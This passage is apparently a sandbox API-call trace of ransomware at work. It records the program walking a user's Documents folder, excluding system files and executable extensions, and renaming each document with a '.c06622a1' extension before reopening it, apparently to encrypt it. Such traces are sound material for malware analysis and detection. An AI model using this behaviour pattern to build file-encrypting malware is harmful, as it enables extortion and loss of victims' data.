(PartialCrc=0xf80, Buffer=0x2690094, Length=0x80) returned 0x833573d0 [0158.134] RtlComputeCrc32 (PartialCrc=0x73d0, Buffer=0x2690094, Length=0x80) returned 0x62e4ee8f [0158.134] RtlComputeCrc32 (PartialCrc=0xee8f, Buffer=0x2690094, Length=0x80) returned 0x1e8770c9 [0158.134] RtlComputeCrc32 (PartialCrc=0x70c9, Buffer=0x2690094, Length=0x80) returned 0xfeecbfb9 [0158.134] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0158.134] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0158.134] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0158.134] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4797c0, ftCreationTime.dwHighDateTime=0x1d5dad8, ftLastAccessTime.dwLowDateTime=0xe5130ae0, ftLastAccessTime.dwHighDateTime=0x1d5dc81, ftLastWriteTime.dwLowDateTime=0xe5130ae0, ftLastWriteTime.dwHighDateTime=0x1d5dc81, nFileSizeHigh=0x0, nFileSizeLow=0x151b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="kMpI.pps", cAlternateFileName="")) returned 1 [0158.134] _wcsicmp (_Str1="kMpI.pps", _Str2="README.c06622a1.TXT") returned -7 [0158.134] wcsstr (_Str="kMpI.pps", _SubStr="README") returned 0x0 [0158.134] _wcsicmp (_Str1="autorun.inf", _Str2="kMpI.pps") returned -10 [0158.134] wcslen (_String="autorun.inf") returned 0xb [0158.134] _wcsicmp (_Str1="boot.ini", _Str2="kMpI.pps") returned -9 [0158.134] wcslen (_String="boot.ini") returned 0x8 [0158.134] _wcsicmp (_Str1="bootfont.bin", _Str2="kMpI.pps") returned -9 [0158.134] wcslen (_String="bootfont.bin") returned 0xc [0158.135] _wcsicmp (_Str1="bootsect.bak", _Str2="kMpI.pps") returned -9 [0158.135] wcslen (_String="bootsect.bak") returned 0xc [0158.135] _wcsicmp (_Str1="desktop.ini", _Str2="kMpI.pps") returned -7 [0158.135] wcslen (_String="desktop.ini") returned 0xb [0158.135] _wcsicmp (_Str1="iconcache.db", _Str2="kMpI.pps") returned -2 [0158.135] wcslen (_String="iconcache.db") returned 0xc [0158.135] _wcsicmp (_Str1="ntldr", _Str2="kMpI.pps") returned 3 [0158.135] wcslen (_String="ntldr") returned 0x5 [0158.135] _wcsicmp (_Str1="ntuser.dat", _Str2="kMpI.pps") returned 3 [0158.135] wcslen (_String="ntuser.dat") returned 0xa [0158.135] _wcsicmp (_Str1="ntuser.dat.log", _Str2="kMpI.pps") returned 3 [0158.135] wcslen (_String="ntuser.dat.log") returned 0xe [0158.135] _wcsicmp (_Str1="ntuser.ini", _Str2="kMpI.pps") returned 3 [0158.135] wcslen (_String="ntuser.ini") returned 0xa [0158.135] _wcsicmp (_Str1="thumbs.db", _Str2="kMpI.pps") returned 9 [0158.135] wcslen (_String="thumbs.db") returned 0x9 [0158.135] _wcsicmp (_Str1="386", _Str2="pps") returned -61 [0158.135] wcslen (_String="386") returned 0x3 [0158.135] _wcsicmp (_Str1="adv", _Str2="pps") returned -15 [0158.135] wcslen (_String="adv") returned 0x3 [0158.135] _wcsicmp (_Str1="ani", _Str2="pps") returned -15 [0158.135] wcslen (_String="ani") returned 0x3 [0158.135] _wcsicmp (_Str1="bat", _Str2="pps") returned -14 [0158.135] wcslen (_String="bat") returned 0x3 [0158.135] _wcsicmp (_Str1="bin", _Str2="pps") returned -14 [0158.135] wcslen (_String="bin") returned 0x3 [0158.135] _wcsicmp (_Str1="cab", _Str2="pps") returned -13 [0158.135] wcslen (_String="cab") returned 0x3 [0158.136] _wcsicmp (_Str1="cmd", _Str2="pps") returned -13 [0158.136] wcslen (_String="cmd") returned 0x3 [0158.136] _wcsicmp (_Str1="com", _Str2="pps") returned -13 [0158.136] wcslen (_String="com") returned 0x3 [0158.136] _wcsicmp (_Str1="cpl", _Str2="pps") returned -13 [0158.136] wcslen (_String="cpl") returned 0x3 [0158.136] _wcsicmp (_Str1="cur", _Str2="pps") returned -13 [0158.136] wcslen (_String="cur") returned 0x3 [0158.136] _wcsicmp (_Str1="deskthemepack", _Str2="pps") returned -12 [0158.136] wcslen (_String="deskthemepack") returned 0xd [0158.136] _wcsicmp (_Str1="diagcab", _Str2="pps") returned -12 [0158.136] wcslen (_String="diagcab") returned 0x7 [0158.136] _wcsicmp (_Str1="diagcfg", _Str2="pps") returned -12 [0158.136] wcslen (_String="diagcfg") returned 0x7 [0158.136] _wcsicmp (_Str1="diagpkg", _Str2="pps") returned -12 [0158.136] wcslen (_String="diagpkg") returned 0x7 [0158.136] _wcsicmp (_Str1="dll", _Str2="pps") returned -12 [0158.136] wcslen (_String="dll") returned 0x3 [0158.136] _wcsicmp (_Str1="drv", _Str2="pps") returned -12 [0158.136] wcslen (_String="drv") returned 0x3 [0158.136] _wcsicmp (_Str1="exe", _Str2="pps") returned -11 [0158.136] wcslen (_String="exe") returned 0x3 [0158.136] _wcsicmp (_Str1="hlp", _Str2="pps") returned -8 [0158.136] wcslen (_String="hlp") returned 0x3 [0158.136] _wcsicmp (_Str1="icl", _Str2="pps") returned -7 [0158.137] wcslen (_String="icl") returned 0x3 [0158.137] _wcsicmp (_Str1="icns", _Str2="pps") returned -7 [0158.137] wcslen (_String="icns") returned 0x4 [0158.137] _wcsicmp (_Str1="ico", _Str2="pps") returned -7 [0158.137] wcslen (_String="ico") returned 0x3 [0158.137] _wcsicmp (_Str1="ics", _Str2="pps") returned -7 [0158.137] wcslen (_String="ics") returned 0x3 [0158.137] _wcsicmp (_Str1="idx", _Str2="pps") returned -7 [0158.137] wcslen (_String="idx") returned 0x3 [0158.137] _wcsicmp (_Str1="ldf", _Str2="pps") returned -4 [0158.137] wcslen (_String="ldf") returned 0x3 [0158.137] _wcsicmp (_Str1="lnk", _Str2="pps") returned -4 [0158.137] wcslen (_String="lnk") returned 0x3 [0158.137] _wcsicmp (_Str1="mod", _Str2="pps") returned -3 [0158.137] wcslen (_String="mod") returned 0x3 [0158.137] _wcsicmp (_Str1="mpa", _Str2="pps") returned -3 [0158.137] wcslen (_String="mpa") returned 0x3 [0158.137] _wcsicmp (_Str1="msc", _Str2="pps") returned -3 [0158.137] wcslen (_String="msc") returned 0x3 [0158.137] _wcsicmp (_Str1="msp", _Str2="pps") returned -3 [0158.137] wcslen (_String="msp") returned 0x3 [0158.137] _wcsicmp (_Str1="msstyles", _Str2="pps") returned -3 [0158.137] wcslen (_String="msstyles") returned 0x8 [0158.137] _wcsicmp (_Str1="msu", _Str2="pps") returned -3 [0158.137] wcslen (_String="msu") returned 0x3 [0158.138] _wcsicmp (_Str1="nls", _Str2="pps") returned -2 [0158.138] wcslen (_String="nls") returned 0x3 [0158.138] _wcsicmp (_Str1="nomedia", _Str2="pps") returned -2 [0158.138] wcslen (_String="nomedia") returned 0x7 [0158.138] _wcsicmp (_Str1="ocx", _Str2="pps") returned -1 [0158.138] wcslen (_String="ocx") returned 0x3 [0158.138] _wcsicmp (_Str1="prf", _Str2="pps") returned 2 [0158.138] wcslen (_String="prf") returned 0x3 [0158.138] _wcsicmp (_Str1="ps1", _Str2="pps") returned 3 [0158.138] wcslen (_String="ps1") returned 0x3 [0158.138] _wcsicmp (_Str1="rom", _Str2="pps") returned 2 [0158.138] wcslen (_String="rom") returned 0x3 [0158.138] _wcsicmp (_Str1="rtp", _Str2="pps") returned 2 [0158.138] wcslen (_String="rtp") returned 0x3 [0158.138] _wcsicmp (_Str1="scr", _Str2="pps") returned 3 [0158.138] wcslen (_String="scr") returned 0x3 [0158.138] _wcsicmp (_Str1="shs", _Str2="pps") returned 3 [0158.138] wcslen (_String="shs") returned 0x3 [0158.138] _wcsicmp (_Str1="spl", _Str2="pps") returned 3 [0158.138] wcslen (_String="spl") returned 0x3 [0158.138] _wcsicmp (_Str1="sys", _Str2="pps") returned 3 [0158.138] wcslen (_String="sys") returned 0x3 [0158.138] _wcsicmp (_Str1="theme", _Str2="pps") returned 4 [0158.138] wcslen (_String="theme") returned 0x5 [0158.139] _wcsicmp (_Str1="themepack", _Str2="pps") returned 4 [0158.139] wcslen (_String="themepack") returned 0x9 [0158.139] _wcsicmp (_Str1="wpx", _Str2="pps") returned 7 [0158.139] wcslen (_String="wpx") returned 0x3 [0158.139] _wcsicmp (_Str1="lock", _Str2="pps") returned -4 [0158.139] wcslen (_String="lock") returned 0x4 [0158.139] _wcsicmp (_Str1="key", _Str2="pps") returned -5 [0158.139] wcslen (_String="key") returned 0x3 [0158.139] _wcsicmp (_Str1="hta", _Str2="pps") returned -8 [0158.139] wcslen (_String="hta") returned 0x3 [0158.139] _wcsicmp (_Str1="msi", _Str2="pps") returned -3 [0158.139] wcslen (_String="msi") returned 0x3 [0158.139] _wcsicmp (_Str1="pdb", _Str2="pps") returned -12 [0158.139] wcslen (_String="pdb") returned 0x3 [0158.139] _wcsicmp (_Str1="sqlite", _Str2="pps") returned 3 [0158.139] wcslen (_String="sqlite") returned 0x6 [0158.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc")) returned 0x10 [0158.139] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0158.140] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" [0158.140] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned 0x39 [0158.140] wcscpy (in: _Dest=0x32400d4, _Source="kMpI.pps" | out: _Dest="kMpI.pps") returned="kMpI.pps" [0158.140] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\kMpI.pps", dwFileAttributes=0x80) returned 1 [0158.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\kMpI.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\kmpi.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0158.140] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.140] ReadFile (in: hFile=0x1e0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0158.141] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x1759aee6 [0158.141] RtlComputeCrc32 (PartialCrc=0xaee6, Buffer=0x32e9a4, Length=0x80) returned 0x123db925 [0158.141] RtlComputeCrc32 (PartialCrc=0xb925, Buffer=0x32e9a4, Length=0x80) returned 0xc710f81d [0158.141] RtlComputeCrc32 (PartialCrc=0xf81d, Buffer=0x32e9a4, Length=0x80) returned 0x8ec12f6f [0158.141] RtlComputeCrc32 (PartialCrc=0x2f6f, Buffer=0x32e9a4, Length=0x80) returned 0x70365ee5 [0158.141] CloseHandle (hObject=0x1e0) returned 1 [0158.142] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0158.142] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\kMpI.pps" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\kMpI.pps") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\kMpI.pps" [0158.142] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\kMpI.pps") returned 0x42 [0158.142] wcscpy (in: _Dest=0x32500ec, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.142] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\kMpI.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\kmpi.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\kMpI.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\kmpi.pps.c06622a1"), dwFlags=0x8) returned 1 [0158.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\kMpI.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\kmpi.pps.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0158.145] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.145] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0158.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2ff18aae [0158.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x58bb1fc6 [0158.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f496a1 [0158.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x68bc4a93 [0158.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3bd7cfcf [0158.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x11b1307a [0158.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7110089a [0158.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x36014df1 [0158.157] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0x7b58e42c [0158.157] RtlComputeCrc32 (PartialCrc=0xe42c, Buffer=0x3480094, Length=0x80) returned 0xf4d86c81 [0158.157] RtlComputeCrc32 (PartialCrc=0x6c81, Buffer=0x3480094, Length=0x80) returned 0xce7668bc [0158.157] RtlComputeCrc32 (PartialCrc=0x68bc, Buffer=0x3480094, Length=0x80) returned 0x9a661127 [0158.157] RtlComputeCrc32 (PartialCrc=0x1127, Buffer=0x3480094, Length=0x80) returned 0x9f1b941a [0158.157] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0158.157] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0158.157] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0158.157] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ef1a90, ftCreationTime.dwHighDateTime=0x1d5e637, ftLastAccessTime.dwLowDateTime=0x9d496580, ftLastAccessTime.dwHighDateTime=0x1d5e44f, ftLastWriteTime.dwLowDateTime=0x9d496580, ftLastWriteTime.dwHighDateTime=0x1d5e44f, nFileSizeHigh=0x0, nFileSizeLow=0x17370, dwReserved0=0x0, dwReserved1=0x0, cFileName="l7DUrqI7053O.pdf", cAlternateFileName="L7DURQ~1.PDF")) returned 1 [0158.157] _wcsicmp (_Str1="l7DUrqI7053O.pdf", _Str2="README.c06622a1.TXT") returned -6 [0158.157] wcsstr (_Str="l7DUrqI7053O.pdf", _SubStr="README") returned 0x0 [0158.157] _wcsicmp (_Str1="autorun.inf", _Str2="l7DUrqI7053O.pdf") returned -11 [0158.157] wcslen (_String="autorun.inf") returned 0xb [0158.157] _wcsicmp (_Str1="boot.ini", _Str2="l7DUrqI7053O.pdf") returned -10 [0158.157] wcslen (_String="boot.ini") returned 0x8 [0158.157] _wcsicmp (_Str1="bootfont.bin", _Str2="l7DUrqI7053O.pdf") returned -10 [0158.158] wcslen (_String="bootfont.bin") returned 0xc [0158.158] _wcsicmp (_Str1="bootsect.bak", _Str2="l7DUrqI7053O.pdf") returned -10 [0158.158] wcslen (_String="bootsect.bak") returned 0xc [0158.158] _wcsicmp (_Str1="desktop.ini", _Str2="l7DUrqI7053O.pdf") returned -8 [0158.158] wcslen (_String="desktop.ini") returned 0xb [0158.158] _wcsicmp (_Str1="iconcache.db", _Str2="l7DUrqI7053O.pdf") returned -3 [0158.158] wcslen (_String="iconcache.db") returned 0xc [0158.158] _wcsicmp (_Str1="ntldr", _Str2="l7DUrqI7053O.pdf") returned 2 [0158.158] wcslen (_String="ntldr") returned 0x5 [0158.158] _wcsicmp (_Str1="ntuser.dat", _Str2="l7DUrqI7053O.pdf") returned 2 [0158.158] wcslen (_String="ntuser.dat") returned 0xa [0158.158] _wcsicmp (_Str1="ntuser.dat.log", _Str2="l7DUrqI7053O.pdf") returned 2 [0158.158] wcslen (_String="ntuser.dat.log") returned 0xe [0158.158] _wcsicmp (_Str1="ntuser.ini", _Str2="l7DUrqI7053O.pdf") returned 2 [0158.158] wcslen (_String="ntuser.ini") returned 0xa [0158.158] _wcsicmp (_Str1="thumbs.db", _Str2="l7DUrqI7053O.pdf") returned 8 [0158.158] wcslen (_String="thumbs.db") returned 0x9 [0158.158] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0158.158] wcslen (_String="386") returned 0x3 [0158.158] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0158.158] wcslen (_String="adv") returned 0x3 [0158.158] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0158.158] wcslen (_String="ani") returned 0x3 [0158.158] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0158.158] wcslen (_String="bat") returned 0x3 [0158.158] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0158.158] wcslen (_String="bin") returned 0x3 [0158.158] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0158.159] wcslen (_String="cab") returned 0x3 [0158.159] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0158.159] wcslen (_String="cmd") returned 0x3 [0158.159] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0158.159] wcslen (_String="com") returned 0x3 [0158.159] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0158.159] wcslen (_String="cpl") returned 0x3 [0158.159] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0158.159] wcslen (_String="cur") returned 0x3 [0158.159] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0158.159] wcslen (_String="deskthemepack") returned 0xd [0158.159] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0158.159] wcslen (_String="diagcab") returned 0x7 [0158.159] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0158.159] wcslen (_String="diagcfg") returned 0x7 [0158.159] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0158.159] wcslen (_String="diagpkg") returned 0x7 [0158.159] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0158.159] wcslen (_String="dll") returned 0x3 [0158.159] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0158.159] wcslen (_String="drv") returned 0x3 [0158.159] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0158.159] wcslen (_String="exe") returned 0x3 [0158.159] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0158.159] wcslen (_String="hlp") returned 0x3 [0158.159] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0158.159] wcslen (_String="icl") returned 0x3 [0158.159] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0158.159] wcslen (_String="icns") returned 0x4 [0158.160] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0158.160] wcslen (_String="ico") returned 0x3 [0158.160] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0158.160] wcslen (_String="ics") returned 0x3 [0158.160] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0158.160] wcslen (_String="idx") returned 0x3 [0158.160] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0158.160] wcslen (_String="ldf") returned 0x3 [0158.160] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0158.160] wcslen (_String="lnk") returned 0x3 [0158.160] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0158.160] wcslen (_String="mod") returned 0x3 [0158.160] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0158.160] wcslen (_String="mpa") returned 0x3 [0158.160] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0158.160] wcslen (_String="msc") returned 0x3 [0158.160] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0158.160] wcslen (_String="msp") returned 0x3 [0158.160] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0158.160] wcslen (_String="msstyles") returned 0x8 [0158.160] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0158.160] wcslen (_String="msu") returned 0x3 [0158.160] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0158.160] wcslen (_String="nls") returned 0x3 [0158.160] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0158.160] wcslen (_String="nomedia") returned 0x7 [0158.160] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0158.160] wcslen (_String="ocx") returned 0x3 [0158.160] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0158.161] wcslen (_String="prf") returned 0x3 [0158.161] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0158.161] wcslen (_String="ps1") returned 0x3 [0158.161] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0158.161] wcslen (_String="rom") returned 0x3 [0158.161] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0158.161] wcslen (_String="rtp") returned 0x3 [0158.161] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0158.161] wcslen (_String="scr") returned 0x3 [0158.161] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0158.161] wcslen (_String="shs") returned 0x3 [0158.161] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0158.161] wcslen (_String="spl") returned 0x3 [0158.161] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0158.161] wcslen (_String="sys") returned 0x3 [0158.161] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0158.161] wcslen (_String="theme") returned 0x5 [0158.161] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0158.161] wcslen (_String="themepack") returned 0x9 [0158.161] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0158.161] wcslen (_String="wpx") returned 0x3 [0158.161] _wcsicmp (_Str1="lock", _Str2="pdf") returned -4 [0158.161] wcslen (_String="lock") returned 0x4 [0158.161] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0158.161] wcslen (_String="key") returned 0x3 [0158.161] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0158.162] wcslen (_String="hta") returned 0x3 [0158.162] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0158.162] wcslen (_String="msi") returned 0x3 [0158.162] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0158.162] wcslen (_String="pdb") returned 0x3 [0158.162] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0158.162] wcslen (_String="sqlite") returned 0x6 [0158.162] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc")) returned 0x10 [0158.162] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0158.162] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" [0158.162] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned 0x39 [0158.162] wcscpy (in: _Dest=0x32400d4, _Source="l7DUrqI7053O.pdf" | out: _Dest="l7DUrqI7053O.pdf") returned="l7DUrqI7053O.pdf" [0158.162] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\l7DUrqI7053O.pdf", dwFileAttributes=0x80) returned 1 [0158.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\l7DUrqI7053O.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\l7durqi7053o.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0158.163] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.163] ReadFile (in: hFile=0x1d8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0158.163] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xdbbfbccf [0158.163] RtlComputeCrc32 (PartialCrc=0xbccf, Buffer=0x32e9a4, Length=0x80) returned 0x6a996486 [0158.163] RtlComputeCrc32 (PartialCrc=0x6486, Buffer=0x32e9a4, Length=0x80) returned 0xaed2cf30 [0158.163] RtlComputeCrc32 (PartialCrc=0xcf30, Buffer=0x32e9a4, Length=0x80) returned 0x90e5240d [0158.164] RtlComputeCrc32 (PartialCrc=0x240d, Buffer=0x32e9a4, Length=0x80) returned 0xbb2e9aaa [0158.164] CloseHandle (hObject=0x1d8) returned 1 [0158.164] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0158.164] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\l7DUrqI7053O.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\l7DUrqI7053O.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\l7DUrqI7053O.pdf" [0158.164] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\l7DUrqI7053O.pdf") returned 0x4a [0158.164] wcscpy (in: _Dest=0x32500fc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.164] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\l7DUrqI7053O.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\l7durqi7053o.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\l7DUrqI7053O.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\l7durqi7053o.pdf.c06622a1"), dwFlags=0x8) returned 1 [0158.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\l7DUrqI7053O.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js 